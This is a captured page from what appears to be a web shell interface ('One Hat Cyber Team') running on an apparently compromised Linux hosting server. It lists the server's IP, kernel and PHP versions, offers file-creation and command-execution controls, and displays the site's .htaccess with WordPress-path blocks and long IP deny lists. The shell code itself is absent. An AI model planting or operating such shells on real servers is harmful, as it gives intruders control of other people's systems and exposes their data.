⚝
One Hat Cyber Team
⚝
Your IP:
216.73.217.37
Server IP:
15.235.14.176
Server:
Linux server2.ihostph.com 4.18.0-553.30.1.el8_10.x86_64 #1 SMP Tue Nov 26 02:30:26 EST 2024 x86_64
Server Software:
Apache
PHP Version:
8.1.34
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
gracious
/
View File Name :
.htaccess
# <IfModule mod_deflate.c> # SetOutputFilter DEFLATE # <IfModule mod_setenvif.c> # # Netscape 4.x has some problems... # BrowserMatch ^Mozilla/4 gzip-only-text/html # # Netscape 4.06-4.08 have some more problems # BrowserMatch ^Mozilla/4\.0[678] no-gzip # # MSIE masquerades as Netscape, but it is fine # # BrowserMatch \bMSIE !no-gzip !gzip-only-text/html # # NOTE: Due to a bug in mod_setenvif up to Apache 2.0.48 # # the above regex won't work. You can use the following # # workaround to get the desired effect: # BrowserMatch \bMSI[E] !no-gzip !gzip-only-text/html # # Don't compress images # SetEnvIfNoCase Request_URI .(?:gif|jpe?g|png)$ no-gzip dont-vary # </IfModule> # <IfModule mod_headers.c> # # Make sure proxies don't deliver the wrong content # Header append Vary User-Agent env=!dont-vary # </IfModule> # # Allow access to all for the rest of the site # Require all granted # </IfModule> <Files 403.shtml> order allow,deny allow from all </Files> RewriteEngine On # Block WordPress-related requests RewriteCond %{REQUEST_URI} ^/wp-admin [OR] RewriteCond %{REQUEST_URI} ^/wp-login\.php [OR] RewriteCond %{REQUEST_URI} ^/wp-content/ [OR] RewriteCond %{REQUEST_URI} ^/wp-includes/ [OR] RewriteCond %{REQUEST_URI} ^/wp-cron\.php RewriteRule .* - [F,L] RewriteCond %{HTTPS} off RewriteRule ^(.*)$ https://%{HTTP_HOST}%{REQUEST_URI} [L,R=301] deny from 45.43.19.210 deny from 13.79.87.25 deny from 152.42.214.182 deny from 66.249.64.107 deny from 199.45.154.120 deny from 180.163.220.51 deny from 206.168.34.83 deny from 142.93.224.18 deny from 34.201.57.57 deny from 101.199.254.200 deny from 64.23.242.200 deny from 101.199.254.0/24 deny from 185.0.0.0/8 deny from 74.0.0.0/8 deny from 31.0.0.0/8 deny from 173.0.0.0/8 deny from 167.0.0.0/8 deny from 147.0.0.0/8 deny from 13.0.0.0/8 deny from 4.0.0.0/8 deny from 40.0.0.0/8 deny from 52.0.0.0/8 deny from 103.0.0.0/8 deny from 103.36.18.241 deny from 213.0.0.0/8 deny from 66.0.0.0/8 deny from 172.0.0.0/8 deny from 130.0.0.0/8 deny from 48.0.0.0/8 deny from 52.169.3.206 deny from 13.79.187.143 deny from 74.241.242.73 # php -- BEGIN cPanel-generated handler, do not edit # Set the “ea-php81” package as the default “PHP” programming language. <IfModule mime_module> AddHandler application/x-httpd-ea-php81 .php .php8 .phtml </IfModule> # php -- END cPanel-generated handler, do not edit